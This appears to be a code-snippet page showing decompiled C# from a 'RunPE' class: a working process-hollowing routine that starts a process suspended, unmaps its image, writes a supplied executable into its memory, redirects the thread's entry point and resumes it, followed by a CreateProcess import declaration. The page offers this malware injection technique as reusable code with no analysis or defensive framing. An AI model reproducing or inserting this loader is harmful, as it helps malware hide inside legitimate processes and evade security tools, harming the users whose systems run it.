Beispiel #1
0
        private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
        {
            string commandLine = string.Format("\"{0}\"", (object)path);

            RunPE.STARTUP_INFORMATION startupInfo        = new RunPE.STARTUP_INFORMATION();
            RunPE.PROCESS_INFORMATION processInformation = new RunPE.PROCESS_INFORMATION();
            startupInfo.Size = checked ((uint)Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION)));
            bool flag1;

            try
            {
                if (!string.IsNullOrEmpty(cmd))
                {
                    commandLine = commandLine + " " + cmd;
                }
                if (!RunPE.CreateProcess(path, commandLine, IntPtr.Zero, IntPtr.Zero, false, 4U, IntPtr.Zero, (string)null, ref startupInfo, ref processInformation))
                {
                    throw new Exception();
                }
                int   int32_1 = BitConverter.ToInt32(data, 60);
                int   int32_2 = BitConverter.ToInt32(data, checked (int32_1 + 52));
                int[] context = new int[179];
                context[0] = 65538;
                if (IntPtr.Size == 4)
                {
                    if (!RunPE.GetThreadContext(processInformation.ThreadHandle, context))
                    {
                        throw new Exception();
                    }
                }
                else if (!RunPE.Wow64GetThreadContext(processInformation.ThreadHandle, context))
                {
                    throw new Exception();
                }
                int num1 = context[41];
                int buffer1;
                int num2;
                if (!RunPE.ReadProcessMemory(processInformation.ProcessHandle, checked (num1 + 8), ref buffer1, 4, ref num2))
                {
                    throw new Exception();
                }
                if (int32_2 == buffer1 && RunPE.NtUnmapViewOfSection(processInformation.ProcessHandle, buffer1) != 0)
                {
                    throw new Exception();
                }
                int  int32_3     = BitConverter.ToInt32(data, checked (int32_1 + 80));
                int  int32_4     = BitConverter.ToInt32(data, checked (int32_1 + 84));
                int  baseAddress = RunPE.VirtualAllocEx(processInformation.ProcessHandle, int32_2, int32_3, 12288, 64);
                bool flag2;
                if (!compatible && baseAddress == 0)
                {
                    flag2       = true;
                    baseAddress = RunPE.VirtualAllocEx(processInformation.ProcessHandle, 0, int32_3, 12288, 64);
                }
                if (baseAddress == 0)
                {
                    throw new Exception();
                }
                if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, baseAddress, data, int32_4, ref num2))
                {
                    throw new Exception();
                }
                int num3 = checked (int32_1 + 248);
                int num4 = checked ((int)BitConverter.ToInt16(data, int32_1 + 6) - 1);
                int num5 = 0;
                while (num5 <= num4)
                {
                    int int32_5 = BitConverter.ToInt32(data, checked (num3 + 12));
                    int int32_6 = BitConverter.ToInt32(data, checked (num3 + 16));
                    int int32_7 = BitConverter.ToInt32(data, checked (num3 + 20));
                    if (int32_6 != 0)
                    {
                        byte[] buffer2 = new byte[checked (int32_6 - 1 + 1)];
                        Buffer.BlockCopy((Array)data, int32_7, (Array)buffer2, 0, buffer2.Length);
                        if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, checked (baseAddress + int32_5), buffer2, buffer2.Length, ref num2))
                        {
                            throw new Exception();
                        }
                    }
                    checked { num3 += 40; }
                    checked { ++num5; }
                }
                byte[] bytes = BitConverter.GetBytes(baseAddress);
                if (!RunPE.WriteProcessMemory(processInformation.ProcessHandle, checked (num1 + 8), bytes, 4, ref num2))
                {
                    throw new Exception();
                }
                int int32_8 = BitConverter.ToInt32(data, checked (int32_1 + 40));
                if (flag2)
                {
                    baseAddress = int32_2;
                }
                context[44] = checked (baseAddress + int32_8);
                if (IntPtr.Size == 4)
                {
                    if (!RunPE.SetThreadContext(processInformation.ThreadHandle, context))
                    {
                        throw new Exception();
                    }
                }
                else if (!RunPE.Wow64SetThreadContext(processInformation.ThreadHandle, context))
                {
                    throw new Exception();
                }
                if (RunPE.ResumeThread(processInformation.ThreadHandle) == -1)
                {
                    throw new Exception();
                }
            }
            catch (Exception ex)
            {
                ProjectData.SetProjectError(ex);
                Process processById = Process.GetProcessById(checked ((int)processInformation.ProcessId));
                if (processById != null)
                {
                    processById.Kill();
                }
                flag1 = false;
                ProjectData.ClearProjectError();
                goto label_41;
            }
            flag1 = true;
label_41:
            return(flag1);
        }
Beispiel #2
0
 private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref RunPE.STARTUP_INFORMATION startupInfo, ref RunPE.PROCESS_INFORMATION processInformation);